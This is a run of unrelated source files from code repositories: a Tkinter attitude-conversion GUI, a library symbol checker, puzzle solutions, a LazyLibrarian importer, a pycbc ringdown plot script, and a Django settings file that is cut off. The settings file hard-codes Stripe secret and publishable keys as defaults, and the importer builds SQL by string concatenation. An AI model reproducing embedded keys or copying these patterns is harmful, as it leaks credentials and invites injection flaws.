Details----------------------------\n\n self.att2CelestLabel = ttk.Label(self.att2CelestFrame, text=\"Celestial\")\n self.att2CelestLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att2RALabel = ttk.Label(self.att2CelestFrame, text=\"RA\")\n self.att2RALabel.grid(row=1, column=0, padx=5)\n\n self.att2DecLabel = ttk.Label(self.att2CelestFrame, text=\"Dec\")\n 
self.att2DecLabel.grid(row=2, column=0, padx=5)\n\n self.att2PALabel = ttk.Label(self.att2CelestFrame, text=\"PA\")\n self.att2PALabel.grid(row=3, column=0, padx=5)\n\n self.att2RAEntry = ttk.Entry(self.att2CelestFrame, width=10, textvariable=att2RA)\n self.att2RAEntry.grid(row=1, column=1)\n\n self.att2DecEntry = ttk.Entry(self.att2CelestFrame, width=10, textvariable=att2Dec)\n self.att2DecEntry.grid(row=2, column=1)\n\n self.att2PAEntry = ttk.Entry(self.att2CelestFrame, width=10, textvariable=att2PA)\n self.att2PAEntry.grid(row=3, column=1)\n\n # Attitude 2 Button 1 Frame - Details-----------------------------\n\n # Button to Convert Celestial to Quaternion\n self.att2CelestToQuatButton = ttk.Button(self.att2But1Frame, text=\"▶\", width=2, command=self.att2CelestToQuat)\n self.att2CelestToQuatButton.grid(row=1, column=1)\n\n # Button to Convert Quaternion to Celestial\n self.att2QuatToCelestButton = ttk.Button(self.att2But1Frame, text=\"◀\", width=2, command=self.att2QuatToCelest)\n self.att2QuatToCelestButton.grid(row=2, column=1)\n\n # Attitude 2 Quaternion Frame - Details----------------------------\n\n self.att2QuatLabel = ttk.Label(self.att2QuatFrame, text=\"Quaternion\")\n self.att2QuatLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att2Quat1Label = ttk.Label(self.att2QuatFrame, text=\"q1\")\n self.att2Quat1Label.grid(row=1, column=0, padx=5)\n\n self.att2Quat2Label = ttk.Label(self.att2QuatFrame, text=\"q2\")\n self.att2Quat2Label.grid(row=2, column=0, padx=5)\n\n self.att2Quat3Label = ttk.Label(self.att2QuatFrame, text=\"q3\")\n self.att2Quat3Label.grid(row=3, column=0, padx=5)\n\n self.att2Quat4Label = ttk.Label(self.att2QuatFrame, text=\"q4\")\n self.att2Quat4Label.grid(row=4, column=0, padx=5)\n\n self.att2Quat1Entry = ttk.Entry(self.att2QuatFrame, width=10, textvariable=att2Quat1)\n self.att2Quat1Entry.grid(row=1, column=1)\n\n self.att2Quat2Entry = ttk.Entry(self.att2QuatFrame, width=10, textvariable=att2Quat2)\n self.att2Quat2Entry.grid(row=2, column=1)\n\n self.att2Quat3Entry = ttk.Entry(self.att2QuatFrame, width=10, textvariable=att2Quat3)\n self.att2Quat3Entry.grid(row=3, column=1)\n\n self.att2Quat4Entry = ttk.Entry(self.att2QuatFrame, width=10, textvariable=att2Quat4)\n self.att2Quat4Entry.grid(row=4, column=1)\n\n # Attitude 2 Button 2 Frame - Details-----------------------------\n\n # Button to Convert Quaternion to Sun Angles\n self.att2CelestToSunAngBut = ttk.Button(self.att2But2Frame, text=\"▶\", width=2, command=self.att2QuatToSunAng)\n self.att2CelestToSunAngBut.grid(row=1, column=1)\n\n # Button to Convert Sun Angles to Quaternion\n self.att2CelestToSunAngBut = ttk.Button(self.att2But2Frame, text=\"◀\", width=2, command=self.att2SunAngToQuat)\n self.att2CelestToSunAngBut.grid(row=2, column=1)\n\n # Attitude 2 Sun Angles Frame - Details---------------------------\n\n self.att2SunAngLabel = ttk.Label(self.att2SunAngFrame, text=\"Sun Angles\")\n self.att2SunAngLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att2SunRollLabel = ttk.Label(self.att2SunAngFrame, text=\"Sun Roll\")\n self.att2SunRollLabel.grid(row=1, column=0, padx=5)\n\n self.att2SunPitchLabel = ttk.Label(self.att2SunAngFrame, text=\"Sun Pitch\")\n self.att2SunPitchLabel.grid(row=2, column=0, padx=5)\n\n self.att2SunYawLabel = ttk.Label(self.att2SunAngFrame, text=\"Sun Yaw\")\n self.att2SunYawLabel.grid(row=3, column=0, padx=5)\n\n self.att2SunRollEntry = ttk.Entry(self.att2SunAngFrame, width=10, textvariable=att2SunRoll)\n self.att2SunRollEntry.grid(row=1, column=1)\n\n 
self.att2SunPitchEntry = ttk.Entry(self.att2SunAngFrame, width=10, textvariable=att2SunPitch)\n self.att2SunPitchEntry.grid(row=2, column=1)\n\n self.att2SunYawEntry = ttk.Entry(self.att2SunAngFrame, width=10, textvariable=att2SunYaw)\n self.att2SunYawEntry.grid(row=3, column=1)\n self.att2SunYawEntry.delete(0,END)\n self.att2SunYawEntry.config(state='disable')\n\n # Slew Section--------------------------------------------------------------------------------------------------\n\n # Slew Top Level Layout--------------------------------------------\n\n # Slew Title\n self.slewLabel = ttk.Label(self.slewFrame, text=\"Slew\")\n self.slewLabel.grid(row=0, column=0, columnspan=5, padx=0, pady=2)\n\n # Slew Momentum Frame\n self.slewMomFrame = ttk.Frame(self.slewFrame, relief='groove')\n self.slewMomFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.slewFrame.columnconfigure(0, weight=4)\n\n # Calculate Slew\n self.slewButton = ttk.Button(self.slewFrame, text=\"▶\", width=2, command=self.slew)\n self.slewButton.grid(row=1, column=1)\n self.slewFrame.columnconfigure(1, weight=1)\n\n # Slew Duration Frame\n self.slewDurFrame = ttk.Frame(self.slewFrame, relief='groove')\n self.slewDurFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.slewFrame.columnconfigure(2, weight=4)\n\n # Slew Angles Frame\n self.slewAngFrame = ttk.Frame(self.slewFrame, relief='groove')\n self.slewAngFrame.grid(row=1, column=3, ipadx=10, ipady=2)\n self.slewFrame.columnconfigure(3, weight=2)\n\n # Clear slew\n self.slewClearButton = ttk.Button(self.slewFrame, text=\"Clear\", width=5, command=self.slewClear)\n self.slewClearButton.grid(row=1, column=4, padx=10)\n self.slewFrame.columnconfigure(4, weight=4)\n\n # Slew Momentum Frame - Details-----------------------------------\n\n self.slewMomLabel = ttk.Label(self.slewMomFrame, text=\"Total System Momentum\")\n self.slewMomLabel.grid(row=0, column=0, columnspan=2, padx=5, pady=2)\n\n self.slewMomUnitLabel = ttk.Label(self.slewMomFrame, text=\"(N-m-s)\")\n self.slewMomUnitLabel.grid(row=1, column=0, padx=5)\n\n self.slewMomEntry = ttk.Entry(self.slewMomFrame, width=10, textvariable=slewMom)\n self.slewMomEntry.grid(row=1, column=1)\n\n # Slew Duration Frame - Details-----------------------------------\n\n self.slewDurLabel = ttk.Label(self.slewDurFrame, text=\"Duration\")\n self.slewDurLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.slewDurUnitLabel = ttk.Label(self.slewDurFrame, text=\"(min)\")\n self.slewDurUnitLabel.grid(row=1, column=0, padx=5)\n\n self.slewDurEntry = ttk.Entry(self.slewDurFrame, width=10, textvariable=slewDur)\n self.slewDurEntry.grid(row=1, column=1)\n self.slewDurEntry.delete(0,END)\n self.slewDurEntry.config(state='readonly')\n\n # Slew Angles Frame - Details-------------------------------------\n\n self.slewAngLabel = ttk.Label(self.slewAngFrame, text=\"Sun Angles\")\n self.slewAngLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.slewAngRollLabel = ttk.Label(self.slewAngFrame, text=\"Roll\")\n self.slewAngRollLabel.grid(row=1, column=0, padx=5)\n\n self.slewAngPitchLabel = ttk.Label(self.slewAngFrame, text=\"Pitch\")\n self.slewAngPitchLabel.grid(row=2, column=0, padx=5)\n\n self.slewAngYawLabel = ttk.Label(self.slewAngFrame, text=\"Yaw\")\n self.slewAngYawLabel.grid(row=3, column=0, padx=5)\n\n self.slewAngRollEntry = ttk.Entry(self.slewAngFrame, width=10, textvariable=slewAngRoll)\n self.slewAngRollEntry.grid(row=1, column=1)\n self.slewAngRollEntry.delete(0,END)\n self.slewAngRollEntry.config(state='readonly')\n\n 
self.slewAngPitchEntry = ttk.Entry(self.slewAngFrame, width=10, textvariable=slewAngPitch)\n self.slewAngPitchEntry.grid(row=2, column=1)\n self.slewAngPitchEntry.delete(0,END)\n self.slewAngPitchEntry.config(state='readonly')\n\n self.slewAngYawEntry = ttk.Entry(self.slewAngFrame, width=10, textvariable=slewAngYaw)\n self.slewAngYawEntry.grid(row=3, column=1)\n self.slewAngYawEntry.delete(0,END)\n self.slewAngYawEntry.config(state='readonly')\n\n # Vectors Section-----------------------------------------------------------------------------------------------\n\n # Vectors Top Level Layout--------------------------------------------\n\n # Vectors Title\n self.vectorsLabel = ttk.Label(self.vectorsFrame, text=\"Vectors\")\n self.vectorsLabel.grid(row=0, column=0, columnspan=5, padx=0, pady=2)\n\n # Vectors ECI Frame\n self.vectorsEciFrame = ttk.Frame(self.vectorsFrame, relief='groove')\n self.vectorsEciFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.vectorsFrame.columnconfigure(0, weight=4)\n\n # Vectors Button 1 Frame\n self.vectorsBut1Frame = ttk.Frame(self.vectorsFrame)\n self.vectorsBut1Frame.grid(row=1, column=1, ipady=2)\n self.vectorsFrame.columnconfigure(1, weight=1)\n\n # Vectors J Frame\n self.vectorsJFrame = ttk.Frame(self.vectorsFrame, relief='groove')\n self.vectorsJFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.vectorsFrame.columnconfigure(2, weight=4)\n\n # Clear vectors\n self.vectorsClearButton = ttk.Button(self.vectorsFrame, text=\"Clear\", width=5, command=self.vectorsClear)\n self.vectorsClearButton.grid(row=1, column=3, padx=10)\n self.vectorsFrame.columnconfigure(3, weight=4)\n\n # Vectors ECI Vector Frame - Details------------------------------\n self.vectorsEciLabel = ttk.Label(self.vectorsEciFrame, text=\"ECI\")\n self.vectorsEciLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.vectorsEciXLabel = ttk.Label(self.vectorsEciFrame, text=\"x\")\n self.vectorsEciXLabel.grid(row=1, column=0, padx=5)\n\n self.vectorsEciYLabel = ttk.Label(self.vectorsEciFrame, text=\"y\")\n self.vectorsEciYLabel.grid(row=2, column=0, padx=5)\n\n self.vectorsEciZLabel = ttk.Label(self.vectorsEciFrame, text=\"z\")\n self.vectorsEciZLabel.grid(row=3, column=0, padx=5)\n\n self.vectorsEciXEntry = ttk.Entry(self.vectorsEciFrame, width=10, textvariable=vectorsEciX)\n self.vectorsEciXEntry.grid(row=1, column=1)\n\n self.vectorsEciYEntry = ttk.Entry(self.vectorsEciFrame, width=10, textvariable=vectorsEciY)\n self.vectorsEciYEntry.grid(row=2, column=1)\n\n self.vectorsEciZEntry = ttk.Entry(self.vectorsEciFrame, width=10, textvariable=vectorsEciZ)\n self.vectorsEciZEntry.grid(row=3, column=1)\n\n # Vectors Button 1 Frame - Details--------------------------------\n\n # Button to Convert ECI Frame to J Frame\n self.vectorsEciToJButton = ttk.Button(self.vectorsBut1Frame, text=\"▶\", width=2, command=self.vectorsEciToJ)\n self.vectorsEciToJButton.grid(row=1, column=1)\n\n # Button to Convert J Frame to ECI Frame\n self.vectorsJToEciButton = ttk.Button(self.vectorsBut1Frame, text=\"◀\", width=2, command=self.vectorsJToEci)\n self.vectorsJToEciButton.grid(row=2, column=1)\n\n # Vectors J Vector Frame - Details------------------------------\n self.vectorsJLabel = ttk.Label(self.vectorsJFrame, text=\"J\")\n self.vectorsJLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.vectorsJ1Label = ttk.Label(self.vectorsJFrame, text=\"J1\")\n self.vectorsJ1Label.grid(row=1, column=0, padx=5)\n\n self.vectorsJ2Label = ttk.Label(self.vectorsJFrame, text=\"J2\")\n self.vectorsJ2Label.grid(row=2, 
column=0, padx=5)\n\n self.vectorsJ3Label = ttk.Label(self.vectorsJFrame, text=\"J3\")\n self.vectorsJ3Label.grid(row=3, column=0, padx=5)\n\n self.vectorsJ1Entry = ttk.Entry(self.vectorsJFrame, width=10, textvariable=vectorsJ1)\n self.vectorsJ1Entry.grid(row=1, column=1)\n\n self.vectorsJ2Entry = ttk.Entry(self.vectorsJFrame, width=10, textvariable=vectorsJ2)\n self.vectorsJ2Entry.grid(row=2, column=1)\n\n self.vectorsJ3Entry = ttk.Entry(self.vectorsJFrame, width=10, textvariable=vectorsJ3)\n self.vectorsJ3Entry.grid(row=3, column=1)\n\n # End Layout----------------------------------------------------------------------------------------------------\n\n def ephPosToVec(self):\n\n # clear sunVec\n self.ephSunVecXEntry.delete(0,END)\n self.ephSunVecYEntry.delete(0,END)\n self.ephSunVecZEntry.delete(0,END)\n\n # sun vector = sun position - JWST position\n self.ephSunVecXEntry.insert(0,ephSunPosX.get()-ephJwstPosX.get())\n self.ephSunVecYEntry.insert(0,ephSunPosY.get()-ephJwstPosY.get())\n self.ephSunVecZEntry.insert(0,ephSunPosZ.get()-ephJwstPosZ.get())\n\n # disable sun position\n self.ephSunPosXEntry.config(state='readonly')\n self.ephSunPosYEntry.config(state='readonly')\n self.ephSunPosZEntry.config(state='readonly')\n\n # disable JWST position\n self.ephJwstPosXEntry.config(state='readonly')\n self.ephJwstPosYEntry.config(state='readonly')\n self.ephJwstPosZEntry.config(state='readonly')\n\n # disable sun vector\n self.ephSunVecXEntry.config(state='readonly')\n self.ephSunVecYEntry.config(state='readonly')\n self.ephSunVecZEntry.config(state='readonly')\n\n def ephVecToNormVec(self):\n\n # clear sunVec\n self.ephSunVecNormXEntry.delete(0,END)\n self.ephSunVecNormYEntry.delete(0,END)\n self.ephSunVecNormZEntry.delete(0,END)\n\n # normalize sun vector\n ephSunVec = np.array([ephSunVecX.get(), ephSunVecY.get(), ephSunVecZ.get()])\n ephSunVecNorm = ephSunVec / np.linalg.norm(ephSunVec)\n self.ephSunVecNormXEntry.insert(0,ephSunVecNorm[0])\n self.ephSunVecNormYEntry.insert(0,ephSunVecNorm[1])\n self.ephSunVecNormZEntry.insert(0,ephSunVecNorm[2])\n\n # disable sun vector\n self.ephSunVecXEntry.config(state='readonly')\n self.ephSunVecYEntry.config(state='readonly')\n self.ephSunVecZEntry.config(state='readonly')\n\n # disable normalized sun vector\n self.ephSunVecNormXEntry.config(state='readonly')\n self.ephSunVecNormYEntry.config(state='readonly')\n self.ephSunVecNormZEntry.config(state='readonly')\n\n def ephClear(self):\n\n # re-enable all ephemeris values\n self.ephJwstPosXEntry.config(state='Normal')\n self.ephJwstPosYEntry.config(state='Normal')\n self.ephJwstPosZEntry.config(state='Normal')\n self.ephSunPosXEntry.config(state='Normal')\n self.ephSunPosYEntry.config(state='Normal')\n self.ephSunPosZEntry.config(state='Normal')\n self.ephSunVecXEntry.config(state='Normal')\n self.ephSunVecYEntry.config(state='Normal')\n self.ephSunVecZEntry.config(state='Normal')\n self.ephSunVecNormXEntry.config(state='Normal')\n self.ephSunVecNormYEntry.config(state='Normal')\n self.ephSunVecNormZEntry.config(state='Normal')\n\n # clear all ephemeris values\n self.ephJwstPosXEntry.delete(0,END)\n self.ephJwstPosYEntry.delete(0,END)\n self.ephJwstPosZEntry.delete(0,END)\n self.ephSunPosXEntry.delete(0,END)\n self.ephSunPosYEntry.delete(0,END)\n self.ephSunPosZEntry.delete(0,END)\n self.ephSunVecXEntry.delete(0,END)\n self.ephSunVecYEntry.delete(0,END)\n self.ephSunVecZEntry.delete(0,END)\n self.ephSunVecNormXEntry.delete(0,END)\n self.ephSunVecNormYEntry.delete(0,END)\n 
self.ephSunVecNormZEntry.delete(0,END)\n\n # Set the focus to the first ephemeris value\n self.ephSunPosXEntry.focus_set()\n\n def att1CelestToQuat(self):\n print('hi')\n\n def att1QuatToCelest(self):\n print('hi')\n\n def att1QuatToSunAng(self):\n print('hi')\n\n def att1SunAngToQuat(self):\n print('hi')\n\n def att1Clear(self):\n\n # re-enable all Attitude 1 values\n self.att1RAEntry.config(state='Normal')\n self.att1DecEntry.config(state='Normal')\n self.att1PAEntry.config(state='Normal')\n self.att1Quat1Entry.config(state='Normal')\n self.att1Quat2Entry.config(state='Normal')\n self.att1Quat3Entry.config(state='Normal')\n self.att1Quat4Entry.config(state='Normal')\n self.att1SunRollEntry.config(state='Normal')\n self.att1SunPitchEntry.config(state='Normal')\n self.att1SunYawEntry.config(state='Normal')\n\n # clear all Attitude 1 values\n self.att1RAEntry.delete(0, END)\n self.att1DecEntry.delete(0, END)\n self.att1PAEntry.delete(0, END)\n self.att1Quat1Entry.delete(0, END)\n self.att1Quat2Entry.delete(0, END)\n self.att1Quat3Entry.delete(0, END)\n self.att1Quat4Entry.delete(0, END)\n self.att1SunRollEntry.delete(0, END)\n self.att1SunPitchEntry.delete(0, END)\n self.att1SunYawEntry.delete(0, END)\n\n # Set the focus to the first Attitude 1 value\n self.att1RAEntry.focus_set()\n\n def att2CelestToQuat(self):\n print('hi')\n\n def att2QuatToCelest(self):\n print('hi')\n\n def att2QuatToSunAng(self):\n print('hi')\n\n def att2SunAngToQuat(self):\n print('hi')\n\n def att2Clear(self):\n\n # re-enable all Attitude 1 values\n self.att2RAEntry.config(state='Normal')\n self.att2DecEntry.config(state='Normal')\n self.att2PAEntry.config(state='Normal')\n self.att2Quat1Entry.config(state='Normal')\n self.att2Quat2Entry.config(state='Normal')\n self.att2Quat3Entry.config(state='Normal')\n self.att2Quat4Entry.config(state='Normal')\n self.att2SunRollEntry.config(state='Normal')\n self.att2SunPitchEntry.config(state='Normal')\n self.att2SunYawEntry.config(state='Normal')\n\n # clear all Attitude 1 values\n self.att2RAEntry.delete(0, END)\n self.att2DecEntry.delete(0, END)\n self.att2PAEntry.delete(0, END)\n self.att2Quat1Entry.delete(0, END)\n self.att2Quat2Entry.delete(0, END)\n self.att2Quat3Entry.delete(0, END)\n self.att2Quat4Entry.delete(0, END)\n self.att2SunRollEntry.delete(0, END)\n self.att2SunPitchEntry.delete(0, END)\n self.att2SunYawEntry.delete(0, END)\n\n # Set the focus to the first Attitude 1 value\n self.att2RAEntry.focus_set()\n\n def slew(self):\n print('hi')\n\n def slewClear(self):\n\n # Re-enable all Slew values\n self.slewMomEntry.config(state='Normal')\n self.slewDurEntry.config(state='Normal')\n self.slewAngRollEntry.config(state='Normal')\n self.slewAngPitchEntry.config(state='Normal')\n self.slewAngYawEntry.config(state='Normal')\n\n # Clear all Slew values\n self.slewMomEntry.delete(0, END)\n self.slewDurEntry.delete(0, END)\n self.slewAngRollEntry.delete(0, END)\n self.slewAngPitchEntry.delete(0, END)\n self.slewAngYawEntry.delete(0, END)\n\n # Set the focus to the first Attitude 1 value\n self.slewMomEntry.focus_set()\n\n # Set outputs to read-only\n self.slewDurEntry.config(state='readonly')\n self.slewAngRollEntry.config(state='readonly')\n self.slewAngPitchEntry.config(state='readonly')\n self.slewAngYawEntry.config(state='readonly')\n\n def vectorsEciToJ(self):\n print('hi')\n\n def vectorsJToEci(self):\n print('hi')\n\n def vectorsClear(self):\n\n # Re-enable all Vector values\n self.vectorsEciXEntry.config(state='Normal')\n 
self.vectorsEciYEntry.config(state='Normal')\n self.vectorsEciZEntry.config(state='Normal')\n self.vectorsJ1Entry.config(state='Normal')\n self.vectorsJ2Entry.config(state='Normal')\n self.vectorsJ3Entry.config(state='Normal')\n\n # Clear all Slew values\n self.vectorsEciXEntry.delete(0, END)\n self.vectorsEciYEntry.delete(0, END)\n self.vectorsEciZEntry.delete(0, END)\n self.vectorsJ1Entry.delete(0, END)\n self.vectorsJ2Entry.delete(0, END)\n self.vectorsJ3Entry.delete(0, END)\n\n # Set the focus to the first Vectors value\n self.vectorsEciXEntry.focus_set()\n\nroot = Tk()\nroot.title('ACS Conversion Tool')\n\napp = AcsGui(root)\n\nroot.mainloop()\n","repo_name":"aarvai/sandbox","sub_path":"acs_gui.py","file_name":"acs_gui.py","file_ext":"py","file_size_in_byte":38939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32443841153","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport platform\nimport subprocess\n\n# This list contains symbols that _might_ be exported for some platforms\nPLATFORM_SYMBOLS = [\n '__bss_end__',\n '__bss_start__',\n '__bss_start',\n '__end__',\n '_bss_end__',\n '_edata',\n '_end',\n '_fini',\n '_init',\n]\n\n\ndef get_symbols(nm, lib):\n '''\n List all the (non platform-specific) symbols exported by the library\n '''\n symbols = []\n platform_name = platform.system()\n output = subprocess.check_output([nm, '-gP', lib],\n stderr=open(os.devnull, 'w')).decode(\"ascii\")\n for line in output.splitlines():\n fields = line.split()\n if len(fields) == 2 or fields[1] == 'U':\n continue\n symbol_name = fields[0]\n if platform_name == 'Linux':\n if symbol_name in PLATFORM_SYMBOLS:\n continue\n elif platform_name == 'Darwin':\n assert symbol_name[0] == '_'\n symbol_name = symbol_name[1:]\n symbols.append(symbol_name)\n\n return symbols\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--symbols-file',\n action='store',\n required=True,\n help='path to file containing symbols')\n parser.add_argument('--lib',\n action='store',\n required=True,\n help='path to library')\n parser.add_argument('--nm',\n action='store',\n required=True,\n help='path to binary (or name in $PATH)')\n args = parser.parse_args()\n\n try:\n lib_symbols = get_symbols(args.nm, args.lib)\n except:\n # We can't run this test, but we haven't technically failed it either\n # Return the GNU \"skip\" error code\n exit(77)\n mandatory_symbols = []\n optional_symbols = []\n with open(args.symbols_file) as symbols_file:\n qualifier_optional = '(optional)'\n for line in symbols_file.readlines():\n\n # Strip comments\n line = line.split('#')[0]\n line = line.strip()\n if not line:\n continue\n\n # Line format:\n # [qualifier] symbol\n qualifier = None\n symbol = None\n\n fields = line.split()\n if len(fields) == 1:\n symbol = fields[0]\n elif len(fields) == 2:\n qualifier = fields[0]\n symbol = fields[1]\n else:\n print(args.symbols_file + ': invalid format: ' + line)\n exit(1)\n\n # The only supported qualifier is 'optional', which means the\n # symbol doesn't have to be exported by the library\n if qualifier and not qualifier == qualifier_optional:\n print(args.symbols_file + ': invalid qualifier: ' + qualifier)\n exit(1)\n\n if qualifier == qualifier_optional:\n optional_symbols.append(symbol)\n else:\n mandatory_symbols.append(symbol)\n\n unknown_symbols = []\n for symbol in lib_symbols:\n if symbol in mandatory_symbols:\n continue\n if symbol in optional_symbols:\n continue\n 
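# any other exported symbol is unexpected\n        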
unknown_symbols.append(symbol)\n\n missing_symbols = [\n sym for sym in mandatory_symbols if sym not in lib_symbols\n ]\n\n for symbol in unknown_symbols:\n print(args.lib + ': unknown symbol exported: ' + symbol)\n\n for symbol in missing_symbols:\n print(args.lib + ': missing symbol: ' + symbol)\n\n if unknown_symbols or missing_symbols:\n exit(1)\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"iridium-browser/iridium-browser","sub_path":"third_party/libdrm/src/symbols-check.py","file_name":"symbols-check.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"53"} +{"seq_id":"13852731936","text":"MOD = 10 ** 9 + 7\n\ndef solve(n, k, b):\n mb = k * (b - 1)\n knapsack = [[0] * (mb + 1) for _ in range(k + 1)]\n knapsack[0][0] = 1\n for i in range(k):\n for j, w in enumerate(knapsack[i]):\n if w > 0:\n for d in range(b):\n knapsack[i + 1][j + d] += w\n knapsack[i + 1][j + d] %= MOD\n mk = k * b\n up = min(mk, n // (b ** k))\n ways = [[0] * (up + 1)]\n ways[0][up] = 1\n for i in range(k, -1, -1):\n rem = 0\n if i > 0:\n rem = n // (b ** (i - 1)) % b\n new_ways = [[0] * (mk + 1) for _ in range(k - i + 2)]\n for free in range(k - i + 1):\n for left, w in enumerate(ways[free]):\n if w == 0:\n continue\n for use in range(left + 1):\n if i > 0 and use > 0 and use - 1 <= mb:\n new_ways[free][min((left - use) * b + rem, mk)] += w * knapsack[free][use - 1]\n new_ways[free][min((left - use) * b + rem, mk)] %= MOD\n if use <= mb:\n new_ways[free + 1][min((left - use) * b + rem, mk)] += w * knapsack[free][use]\n new_ways[free + 1][min((left - use) * b + rem, mk)] %= MOD\n ways = new_ways\n return sum(map(sum, ways)) % MOD\n\nprint(solve(14, 3, 2))\nprint(solve(200, 5, 3))\nprint(solve(1000, 10, 5))\nresult = 0\nfor k in range(10, 16):\n result += solve(10 ** k, k, k)\nprint(result % MOD)\n","repo_name":"ftiasch/acm-icpc","sub_path":"project-euler/p528.py","file_name":"p528.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"53"} +{"seq_id":"33754293485","text":"import numpy as np\n\ninput_file = \"input.txt\"\nraw_input = np.loadtxt(input_file, delimiter=\",\", dtype=int)\n\n\ndef a_day_in_the_sea(swarm):\n # part 1 func, gets the input as it sees, can't scale\n swarm -= 1\n birth_flag = swarm == -1\n swarm[birth_flag] = 6\n birth_count = np.sum(birth_flag, dtype=int)\n return np.concatenate([swarm, np.ones(birth_count, dtype=int) * 8])\n\n\ndef a_day_in_the_sea_but_smarter(swarm):\n birth_count = swarm[0]\n swarm = np.append(swarm[1:], 0)\n swarm[6] += birth_count\n swarm[8] += birth_count\n return swarm\n\nbin_count = np.bincount(raw_input.astype(int))\nswarm = np.pad(bin_count, (0, 9 - bin_count.shape[0]))\n\ndays = 80\nfor day in range(1, days + 1):\n swarm = a_day_in_the_sea_but_smarter(swarm)\n\nprint(f\"After {days} days fish count: {np.sum(swarm)}\")\n","repo_name":"octaskin/aoc21","sub_path":"day06/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10858770011","text":"import time, os, threading\n\nimport lazylibrarian\nfrom lazylibrarian import logger, formatter, database\nfrom lazylibrarian.gr import GoodReads\nfrom lazylibrarian.gb import GoogleBooks\n\n\ndef addAuthorToDB(authorname=None, refresh=False):\n threading.currentThread().name = \"DBIMPORT\"\n type = 'author'\n 
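# open a connection to the LazyLibrarian database\n    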
myDB = database.DBConnection()\n\n    GR = GoodReads(authorname)\n\n    query = \"SELECT * from authors WHERE AuthorName='%s'\" % authorname.replace(\"'\", \"''\")\n    dbauthor = myDB.action(query).fetchone()\n    controlValueDict = {\"AuthorName\": authorname}\n\n    if dbauthor is None:\n        newValueDict = {\n            \"AuthorID\": \"0: %s\" % (authorname),\n            \"Status\": \"Loading\"\n        }\n        logger.info(\"Now adding new author: %s to database\" % authorname)\n    else:\n        newValueDict = {\"Status\": \"Loading\"}\n        logger.info(\"Now updating author: %s\" % authorname)\n    myDB.upsert(\"authors\", newValueDict, controlValueDict)\n\n    author = GR.find_author_id()\n    if author:\n        authorid = author['authorid']\n        authorlink = author['authorlink']\n        authorimg = author['authorimg']\n        controlValueDict = {\"AuthorName\": authorname}\n        newValueDict = {\n            \"AuthorID\": authorid,\n            \"AuthorLink\": authorlink,\n            \"AuthorImg\": authorimg,\n            \"AuthorBorn\": author['authorborn'],\n            \"AuthorDeath\": author['authordeath'],\n            \"DateAdded\": formatter.today(),\n            \"Status\": \"Loading\"\n        }\n        myDB.upsert(\"authors\", newValueDict, controlValueDict)\n    else:\n        logger.error(\"Nothing found\")\n        # bail out here: authorid would be undefined below if the lookup failed\n        return\n\n# process books\n    if lazylibrarian.BOOK_API == \"GoogleBooks\":\n        book_api = GoogleBooks()\n        book_api.get_author_books(authorid, authorname, refresh=refresh)\n    elif lazylibrarian.BOOK_API == \"GoodReads\":\n        GR.get_author_books(authorid, authorname, refresh=refresh)\n\n    logger.info(\"[%s] Author update complete\" % authorname)","repo_name":"relder251/LazyLibrarianRefresh","sub_path":"lazylibrarian/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"19501775019","text":"\"\"\"\nShow how to create a time-domain signal.\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nfrom pycbc.waveform import ringdown_td_approximants\n\n\nparams = dict(\n    lmns=\"221\",\n    tau_220=0.5,\n    f_220=1234.0,\n    amp220=1e-21,\n    phi220=0.3,\n    inclination=0.2,\n    polarization=1.1,\n    t_final=2.0,\n)\n\n# plot waveform\nhp, hc = ringdown_td_approximants[\"TdQNMfromFreqTau\"](\n    f_lower=20,\n    delta_t=1.0/2048,\n    **params,\n)\n\n\nplt.figure()\nplt.title('A Simulated Ring-down Signal Waveform')\nplt.plot(hp.sample_times, hp, color='lightskyblue', linewidth=0.1)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Amplitude\")\n# save before show(): some backends clear the figure once the window is closed\nplt.savefig('InjectedSignalParams.png')\nplt.show()\n\nplt.figure()\n\n# plot frequency domain\nhf = hp.to_frequencyseries()\nplt.semilogx(hf.sample_frequencies, hf.real(), color='lightskyblue')\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Amplitude')\nplt.title('Injected Signal Frequency compared to \\nthe range of Sample Frequencies')\nplt.savefig('InjectedSignal.png')\nplt.show()\n","repo_name":"georgia-github/mastersproject","sub_path":"scripts/test_waveform.py","file_name":"test_waveform.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25890656790","text":"from base import *\n\nDEBUG = True\n\nINSTALLED_APPS.append('debug_toolbar')\n\nMIDDLEWARE.append(\"debug_toolbar.middleware.DebugToolbarMiddleware\")\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.sqlite3',\n        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n    }\n}\n\n# Stripe environment variables\nSTRIPE_PUBLISHABLE = os.getenv('STRIPE_PUBLISHABLE', 'pk_test_FGFeav0Qyh7EWFOE5tjhvUXG')\nSTRIPE_SECRET = os.getenv('STRIPE_SECRET', 'sk_test_eNJCMyNYFWAKhYekmVjdAI2E')\n\n# 
